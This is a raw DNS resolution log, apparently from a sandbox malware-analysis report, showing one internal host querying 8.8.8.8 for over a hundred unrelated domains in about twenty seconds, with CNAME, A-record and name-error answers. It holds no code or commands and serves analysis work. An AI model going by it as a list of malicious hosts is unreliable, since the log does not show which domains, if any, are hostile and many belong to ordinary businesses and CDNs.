                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:51.188328981 CET8.8.8.8192.168.2.60x9fdeNo error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:51.188328981 CET8.8.8.8192.168.2.60x9fdeNo error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:51.188328981 CET8.8.8.8192.168.2.60x9fdeNo error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:51.344706059 CET8.8.8.8192.168.2.60xdebcNo error (0)www.iamdirt.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:51.344706059 CET8.8.8.8192.168.2.60xdebcNo error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:51.344706059 CET8.8.8.8192.168.2.60xdebcNo error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.034847975 CET8.8.8.8192.168.2.60xb6feNo error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.034847975 CET8.8.8.8192.168.2.60xb6feNo error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.047950983 CET8.8.8.8192.168.2.60xcc73No error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.047950983 CET8.8.8.8192.168.2.60xcc73No error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.094182968 CET8.8.8.8192.168.2.60xce55No error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.117017984 CET8.8.8.8192.168.2.60x7ee7No error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.118446112 CET8.8.8.8192.168.2.60xedNo error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.124773979 CET8.8.8.8192.168.2.60x5698No error (0)www.wifi4all.nl188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.124773979 CET8.8.8.8192.168.2.60x5698No error (0)www.wifi4all.nl188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.137649059 CET8.8.8.8192.168.2.60xf7feNo error (0)www.nelipak.nl82.201.61.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.149087906 CET8.8.8.8192.168.2.60xb072No error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.149087906 CET8.8.8.8192.168.2.60xb072No error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.768515110 CET8.8.8.8192.168.2.60xdd30No error (0)www.fcwcvt.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.768515110 CET8.8.8.8192.168.2.60xdd30No error (0)www.fcwcvt.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.774662018 CET8.8.8.8192.168.2.60x192bNo error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.774662018 CET8.8.8.8192.168.2.60x192bNo error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.997236967 CET8.8.8.8192.168.2.60x2337No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.997236967 CET8.8.8.8192.168.2.60x2337No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.003839970 CET8.8.8.8192.168.2.60x758No error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.003839970 CET8.8.8.8192.168.2.60x758No error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.026521921 CET8.8.8.8192.168.2.60x5faeNo error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.085078955 CET8.8.8.8192.168.2.60xdb37No error (0)www.cokocoko.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.085078955 CET8.8.8.8192.168.2.60xdb37No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.085078955 CET8.8.8.8192.168.2.60xdb37No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.085078955 CET8.8.8.8192.168.2.60xdb37No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.489774942 CET8.8.8.8192.168.2.60x70f3No error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.593668938 CET8.8.8.8192.168.2.60xb1acNo error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.593668938 CET8.8.8.8192.168.2.60xb1acNo error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.793585062 CET8.8.8.8192.168.2.60xe2d1No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.797576904 CET8.8.8.8192.168.2.60x93aaName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.801685095 CET8.8.8.8192.168.2.60x4126No error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.801685095 CET8.8.8.8192.168.2.60x4126No error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.807847977 CET8.8.8.8192.168.2.60xab74No error (0)www.snugpak.com104.21.73.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.807847977 CET8.8.8.8192.168.2.60xab74No error (0)www.snugpak.com172.67.165.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.913899899 CET8.8.8.8192.168.2.60x69b6No error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.172945023 CET8.8.8.8192.168.2.60x3b88No error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.303883076 CET8.8.8.8192.168.2.60x817fNo error (0)www.kernsafe.com104.26.3.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.303883076 CET8.8.8.8192.168.2.60x817fNo error (0)www.kernsafe.com104.26.2.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.303883076 CET8.8.8.8192.168.2.60x817fNo error (0)www.kernsafe.com172.67.72.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.422641993 CET8.8.8.8192.168.2.60xef10No error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.442620993 CET8.8.8.8192.168.2.60x35e0No error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.460545063 CET8.8.8.8192.168.2.60x4e84No error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.511337996 CET8.8.8.8192.168.2.60x452dNo error (0)www.netcr.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.511337996 CET8.8.8.8192.168.2.60x452dNo error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.511337996 CET8.8.8.8192.168.2.60x452dNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.511337996 CET8.8.8.8192.168.2.60x452dNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.092679977 CET8.8.8.8192.168.2.60x983fNo error (0)www.findbc.com13.248.216.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.092679977 CET8.8.8.8192.168.2.60x983fNo error (0)www.findbc.com76.223.65.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.125538111 CET8.8.8.8192.168.2.60x17c9No error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.125538111 CET8.8.8.8192.168.2.60x17c9No error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.230078936 CET8.8.8.8192.168.2.60x557Name error (3)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.263066053 CET8.8.8.8192.168.2.60x7a3cNo error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.303581953 CET8.8.8.8192.168.2.60xb22cNo error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.494029999 CET8.8.8.8192.168.2.60xdd17No error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.676007986 CET8.8.8.8192.168.2.60x8e06No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.779480934 CET8.8.8.8192.168.2.60x1f85No error (0)www.railbook.net81.171.22.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.961756945 CET8.8.8.8192.168.2.60xf34fNo error (0)www.kernsafe.com104.26.3.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.961756945 CET8.8.8.8192.168.2.60xf34fNo error (0)www.kernsafe.com172.67.72.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.961756945 CET8.8.8.8192.168.2.60xf34fNo error (0)www.kernsafe.com104.26.2.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.969463110 CET8.8.8.8192.168.2.60xb56No error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.977299929 CET8.8.8.8192.168.2.60x9dffNo error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.977998018 CET8.8.8.8192.168.2.60x3fafNo error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.977998018 CET8.8.8.8192.168.2.60x3fafNo error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.977998018 CET8.8.8.8192.168.2.60x3fafNo error (0)d2kt7vovxa5e81.cloudfront.net143.204.9.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.977998018 CET8.8.8.8192.168.2.60x3fafNo error (0)d2kt7vovxa5e81.cloudfront.net143.204.9.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.977998018 CET8.8.8.8192.168.2.60x3fafNo error (0)d2kt7vovxa5e81.cloudfront.net143.204.9.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.977998018 CET8.8.8.8192.168.2.60x3fafNo error (0)d2kt7vovxa5e81.cloudfront.net143.204.9.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:56.764617920 CET8.8.8.8192.168.2.60xf56eNo error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:56.764617920 CET8.8.8.8192.168.2.60xf56eNo error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:56.764617920 CET8.8.8.8192.168.2.60xf56eNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:56.800234079 CET8.8.8.8192.168.2.60x72aeNo error (0)www.dayvo.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:56.800234079 CET8.8.8.8192.168.2.60x72aeNo error (0)www.dayvo.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:57.035895109 CET8.8.8.8192.168.2.60x7670No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:57.182801962 CET8.8.8.8192.168.2.60x7a88No error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:57.182801962 CET8.8.8.8192.168.2.60x7a88No error (0)d2r2uj0bnofxxz.cloudfront.net143.204.9.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:57.182801962 CET8.8.8.8192.168.2.60x7a88No error (0)d2r2uj0bnofxxz.cloudfront.net143.204.9.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:57.182801962 CET8.8.8.8192.168.2.60x7a88No error (0)d2r2uj0bnofxxz.cloudfront.net143.204.9.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:57.182801962 CET8.8.8.8192.168.2.60x7a88No error (0)d2r2uj0bnofxxz.cloudfront.net143.204.9.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:57.367845058 CET8.8.8.8192.168.2.60x86b0No error (0)www.stajum.com103.3.1.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:57.454700947 CET8.8.8.8192.168.2.60xd7a1No error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:57.454700947 CET8.8.8.8192.168.2.60xd7a1No error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:57.483715057 CET8.8.8.8192.168.2.60x58dfNo error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:57.649022102 CET8.8.8.8192.168.2.60x54d3No error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:57.774034023 CET8.8.8.8192.168.2.60x133aNo error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:58.922768116 CET8.8.8.8192.168.2.60xa152No error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:58.922768116 CET8.8.8.8192.168.2.60xa152No error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:58.922768116 CET8.8.8.8192.168.2.60xa152No error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:58.922768116 CET8.8.8.8192.168.2.60xa152No error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:58.922768116 CET8.8.8.8192.168.2.60xa152No error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.0.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:58.941283941 CET8.8.8.8192.168.2.60x7c4bNo error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:58.941283941 CET8.8.8.8192.168.2.60x7c4bNo error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:58.941283941 CET8.8.8.8192.168.2.60x7c4bNo error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.052504063 CET8.8.8.8192.168.2.60xa152No error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.052504063 CET8.8.8.8192.168.2.60xa152No error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.052504063 CET8.8.8.8192.168.2.60xa152No error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.052504063 CET8.8.8.8192.168.2.60xa152No error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.052504063 CET8.8.8.8192.168.2.60xa152No error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.3.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.081161976 CET8.8.8.8192.168.2.60xa152No error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.081161976 CET8.8.8.8192.168.2.60xa152No error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.081161976 CET8.8.8.8192.168.2.60xa152No error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.081161976 CET8.8.8.8192.168.2.60xa152No error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.081161976 CET8.8.8.8192.168.2.60xa152No error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.3.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.289633989 CET8.8.8.8192.168.2.60x6145No error (0)www.myropcb.com74.208.215.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.490566015 CET8.8.8.8192.168.2.60xcad5No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.490566015 CET8.8.8.8192.168.2.60xcad5No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.417896032 CET8.8.8.8192.168.2.60xb27eNo error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.906528950 CET8.8.8.8192.168.2.60x66ceNo error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:01.231668949 CET8.8.8.8192.168.2.60xf05No error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:02.495039940 CET8.8.8.8192.168.2.60x62beNo error (0)www.fnsds.orgcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:02.495039940 CET8.8.8.8192.168.2.60x62beNo error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:02.495039940 CET8.8.8.8192.168.2.60x62beNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com52.200.100.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:02.495039940 CET8.8.8.8192.168.2.60x62beNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.237.200.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:03.826936007 CET8.8.8.8192.168.2.60xade1No error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:04.956274033 CET8.8.8.8192.168.2.60x4590No error (0)www.pohlfood.compohlfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:04.956274033 CET8.8.8.8192.168.2.60x4590No error (0)pohlfood.com104.218.10.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.081479073 CET8.8.8.8192.168.2.60xa4eaNo error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.436078072 CET8.8.8.8192.168.2.60x8eadNo error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.436078072 CET8.8.8.8192.168.2.60x8eadNo error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.882019043 CET8.8.8.8192.168.2.60x49c7No error (0)www.x0c.com185.53.177.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.333549023 CET8.8.8.8192.168.2.60x1d54Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.341634035 CET8.8.8.8192.168.2.60x44a4No error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.237910986 CET8.8.8.8192.168.2.60x2d80No error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.237910986 CET8.8.8.8192.168.2.60x2d80No error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:08.410984039 CET8.8.8.8192.168.2.60x2b54No error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.614378929 CET8.8.8.8192.168.2.60xd15bNo error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.614378929 CET8.8.8.8192.168.2.60xd15bNo error (0)d2r2uj0bnofxxz.cloudfront.net143.204.9.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.614378929 CET8.8.8.8192.168.2.60xd15bNo error (0)d2r2uj0bnofxxz.cloudfront.net143.204.9.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.614378929 CET8.8.8.8192.168.2.60xd15bNo error (0)d2r2uj0bnofxxz.cloudfront.net143.204.9.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.614378929 CET8.8.8.8192.168.2.60xd15bNo error (0)d2r2uj0bnofxxz.cloudfront.net143.204.9.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.769985914 CET8.8.8.8192.168.2.60x556dNo error (0)www.tyrns.com62.75.216.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:11.041577101 CET8.8.8.8192.168.2.60x1e5fNo error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:11.120851040 CET8.8.8.8192.168.2.60xcc5No error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:11.513273954 CET8.8.8.8192.168.2.60x4dc4No error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:11.513273954 CET8.8.8.8192.168.2.60x4dc4No error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:11.573172092 CET8.8.8.8192.168.2.60x5626No error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:11.744540930 CET8.8.8.8192.168.2.60xb41No error (0)www.tc17.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:11.744540930 CET8.8.8.8192.168.2.60xb41No error (0)www.tc17.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:12.062362909 CET8.8.8.8192.168.2.60xc750Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:12.328068018 CET8.8.8.8192.168.2.60x7a0eNo error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:12.328068018 CET8.8.8.8192.168.2.60x7a0eNo error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:12.349879026 CET8.8.8.8192.168.2.60xee3No error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:12.349879026 CET8.8.8.8192.168.2.60xee3No error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:12.349879026 CET8.8.8.8192.168.2.60xee3No error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
